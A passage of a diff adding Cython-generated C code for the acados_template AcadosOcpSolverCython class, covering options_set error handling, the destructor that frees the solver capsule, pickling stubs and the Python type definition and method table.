__Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __pyx_t_11 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_11)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_11); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_11, __pyx_v_field_, __pyx_t_5}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 701, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":700 + * + * else: + * raise Exception('AcadosOcpSolverCython.options_set() does not support field {}.'\ # <<<<<<<<<<<<<< + * '\n Possible values are {}.'.format(field_, ', '.join(int_fields + double_fields + string_fields))) + * + */ + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 700, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 700, __pyx_L1_error) + } + __pyx_L3:; + + /* "acados_template/acados_ocp_solver_pyx.pyx":641 + * + * + * def options_set(self, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set options of the solver. + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __PYX_XCLEAR_MEMVIEW(&__pyx_t_9, 1); + __Pyx_XDECREF(__pyx_t_11); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.options_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_int_fields); + __Pyx_XDECREF(__pyx_v_double_fields); + __Pyx_XDECREF(__pyx_v_string_fields); + __Pyx_XDECREF(__pyx_v_field); + __PYX_XCLEAR_MEMVIEW(&__pyx_v_string_value, 1); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":704 + * + * + * def __del__(self): # <<<<<<<<<<<<<< + * if self.solver_created: + * acados_solver.acados_free(self.capsule) + */ + +/* Python wrapper */ +static void __pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_45__del__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_45__del__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__del__ (wrapper)", 0); + __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_44__del__(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_44__del__(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__del__", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":705 + * + * def __del__(self): + * if self.solver_created: # <<<<<<<<<<<<<< + * acados_solver.acados_free(self.capsule) + * acados_solver.acados_free_capsule(self.capsule) + */ + if (__pyx_v_self->solver_created) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":706 + * def __del__(self): + * if self.solver_created: + * acados_solver.acados_free(self.capsule) # <<<<<<<<<<<<<< + * acados_solver.acados_free_capsule(self.capsule) + */ + (void)(lat_acados_free(__pyx_v_self->capsule)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":707 + * if self.solver_created: + * acados_solver.acados_free(self.capsule) + * acados_solver.acados_free_capsule(self.capsule) # <<<<<<<<<<<<<< + */ + (void)(lat_acados_free_capsule(__pyx_v_self->capsule)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":705 + * + * def __del__(self): + * if self.solver_created: # <<<<<<<<<<<<<< + * acados_solver.acados_free(self.capsule) + * acados_solver.acados_free_capsule(self.capsule) + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":704 + * + * + * def __del__(self): # <<<<<<<<<<<<<< + * if self.solver_created: + * acados_solver.acados_free(self.capsule) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__ = {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_46__reduce_cython__(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_46__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_48__setstate_cython__(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_48__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_tp_new_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython(PyTypeObject *t, PyObject *a, PyObject *k) { + struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)o); + p->model_name = ((PyObject*)Py_None); Py_INCREF(Py_None); + p->nlp_solver_type = ((PyObject*)Py_None); Py_INCREF(Py_None); + if (unlikely(__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_1__cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +#if CYTHON_USE_TP_FINALIZE +static void __pyx_tp_finalize_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython(PyObject *o) { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_45__del__(o); + PyErr_Restore(etype, eval, etb); +} +#endif + +static void __pyx_tp_dealloc_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython(PyObject *o) { + struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *p = (struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + Py_CLEAR(p->model_name); + Py_CLEAR(p->nlp_solver_type); + (*Py_TYPE(o)->tp_free)(o); +} + +static PyMethodDef __pyx_methods_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython[] = { + {"_AcadosOcpSolverCython__get_pointers_solver", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_3_AcadosOcpSolverCython__get_pointers_solver, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver}, + {"solve", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_5solve, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve}, + {"reset", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_7reset, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset}, + {"set_new_time_steps", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_9set_new_time_steps, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps}, + {"update_qp_solver_cond_N", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_11update_qp_solver_cond_N, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N}, + {"eval_param_sens", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_13eval_param_sens, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens}, + {"get", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get}, + {"print_statistics", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_17print_statistics, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics}, + {"store_iterate", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_19store_iterate, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate}, + {"load_iterate", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_21load_iterate, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate}, + {"get_stats", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_23get_stats, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats}, + {"_AcadosOcpSolverCython__get_stat_int", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_25_AcadosOcpSolverCython__get_stat_int, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"_AcadosOcpSolverCython__get_stat_double", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_27_AcadosOcpSolverCython__get_stat_double, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"_AcadosOcpSolverCython__get_stat_matrix", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_29_AcadosOcpSolverCython__get_stat_matrix, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"get_cost", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost}, + {"get_residuals", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals}, + {"set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_35set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set}, + {"cost_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_37cost_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set}, + {"constraints_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_39constraints_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set}, + {"dynamics_get", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get}, + {"options_set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_43options_set, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_47__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_49__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython}, + {Py_tp_doc, (void *)PyDoc_STR("\n Class to interact with the acados ocp solver C object.\n ")}, + {Py_tp_methods, (void *)__pyx_methods_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython}, + {Py_tp_new, (void *)__pyx_tp_new_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython}, + #if PY_VERSION_HEX >= 0x030400a1 + {Py_tp_finalize, (void *)__pyx_tp_finalize_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython}, + #endif + {0, 0}, +}; +static PyType_Spec __pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython_spec = { + "acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython", + sizeof(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_FINALIZE, + __pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython_slots, +}; +#else + +static PyTypeObject __pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython = { + PyVarObject_HEAD_INIT(0, 0) + "acados_template.acados_ocp_solver_pyx.""AcadosOcpSolverCython", /*tp_name*/ + sizeof(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ + PyDoc_STR("\n Class to interact with the acados ocp solver C object.\n "), /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + __pyx_tp_finalize_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 